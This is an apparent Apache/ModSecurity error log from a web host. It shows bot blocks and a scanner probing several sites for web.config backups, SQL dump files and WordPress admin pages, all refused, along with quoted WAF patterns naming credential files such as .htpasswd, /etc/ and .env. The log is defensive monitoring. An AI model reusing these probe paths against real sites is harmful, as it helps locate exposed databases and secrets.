[Tue May 26 13:06:02.091195 2026] [security2:error] [pid 485064:tid 485230] [client 85.208.96.203:32018] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahVNYj9tlF55stOmSqEPYAAAAKk"]
[Tue May 26 13:06:02.091320 2026] [security2:error] [pid 485064:tid 485230] [client 85.208.96.203:32018] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahVNYj9tlF55stOmSqEPYAAAAKk"]
[Tue May 26 13:06:04.306979 2026] [security2:error] [pid 485064:tid 485155] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config"] [unique_id "ahVNZD9tlF55stOmSqEPqgABA1o"]
[Tue May 26 13:06:04.487682 2026] [security2:error] [pid 485064:tid 485170] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config.old"] [unique_id "ahVNZD9tlF55stOmSqEPsgABAWk"]
[Tue May 26 13:06:04.577981 2026] [security2:error] [pid 485064:tid 485299] [client 14.234.81.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNZD9tlF55stOmSqEPpQAAAO4"]
[Tue May 26 13:06:04.586905 2026] [security2:error] [pid 485064:tid 485236] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNZD9tlF55stOmSqEPpAAAAK8"]
[Tue May 26 13:06:04.668864 2026] [security2:error] [pid 485064:tid 485130] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config.bak"] [unique_id "ahVNZD9tlF55stOmSqEPtgAAykE"]
[Tue May 26 13:06:04.850082 2026] [security2:error] [pid 485064:tid 485171] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config.txt"] [unique_id "ahVNZD9tlF55stOmSqEPwAAAo2o"]
[Tue May 26 13:06:05.030817 2026] [security2:error] [pid 485064:tid 485175] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/Web.config"] [unique_id "ahVNZT9tlF55stOmSqEPygAArm4"]
[Tue May 26 13:06:05.543899 2026] [security2:error] [pid 485064:tid 485281] [client 74.249.173.207:4321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/inputs.php"] [unique_id "ahVNZT9tlF55stOmSqEP3gAAANw"]
[Tue May 26 13:06:06.534883 2026] [security2:error] [pid 485064:tid 485276] [client 74.249.173.207:4306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/ioxi-o.php"] [unique_id "ahVNZj9tlF55stOmSqEQAgAAANc"]
[Tue May 26 13:06:06.694036 2026] [security2:error] [pid 485064:tid 485198] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNZj9tlF55stOmSqEP9QAAAIk"]
[Tue May 26 13:06:07.645068 2026] [security2:error] [pid 485064:tid 485084] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/database.php"] [unique_id "ahVNZz9tlF55stOmSqEQKQAAlxM"]
[Tue May 26 13:06:08.201868 2026] [security2:error] [pid 485064:tid 485091] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/db.php"] [unique_id "ahVNaD9tlF55stOmSqEQNQAAtBo"]
[Tue May 26 13:06:08.983930 2026] [security2:error] [pid 485064:tid 485314] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNaD9tlF55stOmSqEQRQAAAP0"]
[Tue May 26 13:06:09.149068 2026] [security2:error] [pid 485064:tid 485070] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/db.sql"] [unique_id "ahVNaT9tlF55stOmSqEQVQAA5AU"]
[Tue May 26 13:06:09.331508 2026] [security2:error] [pid 485064:tid 485100] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/database.sql"] [unique_id "ahVNaT9tlF55stOmSqEQXwAApSM"]
[Tue May 26 13:06:09.513707 2026] [security2:error] [pid 485064:tid 485127] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/dump.sql"] [unique_id "ahVNaT9tlF55stOmSqEQZgAA_D4"]
[Tue May 26 13:06:09.695530 2026] [security2:error] [pid 485064:tid 485109] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/backup.sql"] [unique_id "ahVNaT9tlF55stOmSqEQawAArSw"]
[Tue May 26 13:06:09.878515 2026] [security2:error] [pid 485064:tid 485102] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/data.sql"] [unique_id "ahVNaT9tlF55stOmSqEQdAAApyU"]
[Tue May 26 13:06:10.061111 2026] [security2:error] [pid 485064:tid 485118] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/mysql.sql"] [unique_id "ahVNaj9tlF55stOmSqEQeAAA9DU"]
[Tue May 26 13:06:10.243262 2026] [security2:error] [pid 485064:tid 485087] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/schema.sql"] [unique_id "ahVNaj9tlF55stOmSqEQfgAAiRY"]
[Tue May 26 13:06:10.425239 2026] [security2:error] [pid 485064:tid 485172] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/seed.sql"] [unique_id "ahVNaj9tlF55stOmSqEQiQAA5ms"]
[Tue May 26 13:06:10.518332 2026] [security2:error] [pid 485064:tid 485206] [client 223.109.255.206:42841] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNaj9tlF55stOmSqEQigAAAJE"], referer: http://pic.sogou.com
[Tue May 26 13:06:10.606957 2026] [security2:error] [pid 485064:tid 485190] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/migration.sql"] [unique_id "ahVNaj9tlF55stOmSqEQjwAAvn0"]
[Tue May 26 13:06:10.789915 2026] [security2:error] [pid 485064:tid 485120] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/structure.sql"] [unique_id "ahVNaj9tlF55stOmSqEQkwAA8jc"]
[Tue May 26 13:06:10.972331 2026] [security2:error] [pid 485064:tid 485123] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/init.sql"] [unique_id "ahVNaj9tlF55stOmSqEQmgAA3Do"]
[Tue May 26 13:06:11.155381 2026] [security2:error] [pid 485064:tid 485089] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/create.sql"] [unique_id "ahVNaz9tlF55stOmSqEQmwAAkBg"]
[Tue May 26 13:06:11.338603 2026] [security2:error] [pid 485064:tid 485076] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/tables.sql"] [unique_id "ahVNaz9tlF55stOmSqEQoAAA0As"]
[Tue May 26 13:06:11.520584 2026] [security2:error] [pid 485064:tid 485169] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/users.sql"] [unique_id "ahVNaz9tlF55stOmSqEQqQAA6Gg"]
[Tue May 26 13:06:11.702895 2026] [security2:error] [pid 485064:tid 485110] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/import.sql"] [unique_id "ahVNaz9tlF55stOmSqEQrwAAvC0"]
[Tue May 26 13:06:11.884977 2026] [security2:error] [pid 485064:tid 485119] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/export.sql"] [unique_id "ahVNaz9tlF55stOmSqEQvwAAlzY"]
[Tue May 26 13:06:12.077410 2026] [security2:error] [pid 485064:tid 485204] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNaz9tlF55stOmSqEQrAAAAI8"]
[Tue May 26 13:06:12.637747 2026] [security2:error] [pid 485064:tid 485285] [client 74.249.173.207:4743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/function/function.php"] [unique_id "ahVNbD9tlF55stOmSqEQ1gAAAOA"]
[Tue May 26 13:06:13.744006 2026] [security2:error] [pid 485064:tid 485212] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNbT9tlF55stOmSqEQ9wAAAJc"]
[Tue May 26 13:06:14.447721 2026] [autoindex:error] [pid 485064:tid 485260] [client 103.108.58.177:19909] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:06:16.186364 2026] [security2:error] [pid 485064:tid 485248] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNbz9tlF55stOmSqERSgAAALs"]
[Tue May 26 13:06:16.629523 2026] [security2:error] [pid 485064:tid 485129] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahVNcD9tlF55stOmSqERYAAA3kA"]
[Tue May 26 13:06:16.984827 2026] [security2:error] [pid 485064:tid 485194] [client 74.249.173.207:4336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/rip.php"] [unique_id "ahVNcD9tlF55stOmSqERbwAAAIU"]
[Tue May 26 13:06:17.361355 2026] [security2:error] [pid 485064:tid 485184] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVNcT9tlF55stOmSqERewAAi3c"]
[Tue May 26 13:06:17.497902 2026] [core:crit] [pid 485064:tid 485213] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:06:17.542118 2026] [security2:error] [pid 485064:tid 485152] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/admin-post.php"] [unique_id "ahVNcT9tlF55stOmSqERggABA1c"]
[Tue May 26 13:06:17.722494 2026] [security2:error] [pid 485064:tid 485150] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/install.php"] [unique_id "ahVNcT9tlF55stOmSqERjwAAv1U"]
[Tue May 26 13:06:17.903073 2026] [security2:error] [pid 485064:tid 485131] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVNcT9tlF55stOmSqERkAABAEI"]
[Tue May 26 13:06:18.083815 2026] [security2:error] [pid 485064:tid 485164] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/upgrade.php"] [unique_id "ahVNcj9tlF55stOmSqERkQAAx2M"]
[Tue May 26 13:06:18.264393 2026] [security2:error] [pid 485064:tid 485149] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/options.php"] [unique_id "ahVNcj9tlF55stOmSqERnAAAylQ"]
[Tue May 26 13:06:18.445261 2026] [security2:error] [pid 485064:tid 485186] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/users.php"] [unique_id "ahVNcj9tlF55stOmSqERnwAAuXk"]
[Tue May 26 13:06:18.625831 2026] [security2:error] [pid 485064:tid 485147] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/plugins.php"] [unique_id "ahVNcj9tlF55stOmSqERpAAA31I"]
[Tue May 26 13:06:18.806397 2026] [security2:error] [pid 485064:tid 485176] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/themes.php"] [unique_id "ahVNcj9tlF55stOmSqERrgAA928"]
[Tue May 26 13:06:18.986983 2026] [security2:error] [pid 485064:tid 485128] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/edit.php"] [unique_id "ahVNcj9tlF55stOmSqERtQAAyD8"]
[Tue May 26 13:06:19.143887 2026] [security2:error] [pid 485064:tid 485216] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNcj9tlF55stOmSqERpwAAAJs"]
[Tue May 26 13:06:19.167934 2026] [security2:error] [pid 485064:tid 485148] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/post-new.php"] [unique_id "ahVNcz9tlF55stOmSqERtgAA9VM"]
[Tue May 26 13:06:19.352120 2026] [security2:error] [pid 485064:tid 485141] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/upload.php"] [unique_id "ahVNcz9tlF55stOmSqERvwABAUw"]
[Tue May 26 13:06:19.532423 2026] [security2:error] [pid 485064:tid 485134] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/media-new.php"] [unique_id "ahVNcz9tlF55stOmSqERywAAtEU"]
[Tue May 26 13:06:19.713006 2026] [security2:error] [pid 485064:tid 485145] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/export.php"] [unique_id "ahVNcz9tlF55stOmSqER0AAA8FA"]
